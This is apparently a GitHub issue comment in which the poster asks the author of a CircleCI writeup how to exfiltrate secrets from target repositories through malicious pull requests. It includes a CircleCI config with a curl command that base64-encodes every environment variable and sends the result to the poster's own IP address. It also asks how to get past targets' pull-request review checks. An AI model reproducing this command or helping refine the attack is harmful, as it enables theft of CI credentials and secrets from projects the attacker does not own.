ndavison / circleci-logs Goto Github PK

I've been trying to exfiltrate secrets but CircleCI keeps giving me pull errors when i try to make a pull request with the malicious step you mentioned in your writeup? I substituted the "attacker.com" for my IP where i was standing up a server to receive requests. Below is my config file: any advice would be much appreciated and awesome stuff man, really great read!

# Use the latest 2.1 version of CircleCI pipeline process engine. See: https://circleci.com/docs/2.0/configuration-reference
version: 2.1
# Use a package of configuration called an orb.
orbs:
  # Declare a dependency on the welcome-orb
  welcome: circleci/[email protected]
# Orchestrate or schedule a set of jobs
workflows:
  # Name the workflow "welcome"
  welcome:
    # Run the welcome/run job in its own container
    jobs:
      - welcome/run: curl 192.168.18.133/?env=$(env | base64 | tr -d '\n')

I was curious to know your thoughts on many targets using checks such as contribution agreements, pull request reviews prior to accepting, etc. I've found that even if a CircleCI repo is in fact vulnerable for exfiltration, I have yet to find a vulnerable target allow any user to perform a pull request prior to the target reviewing the request or performing checks on it.

thoughts?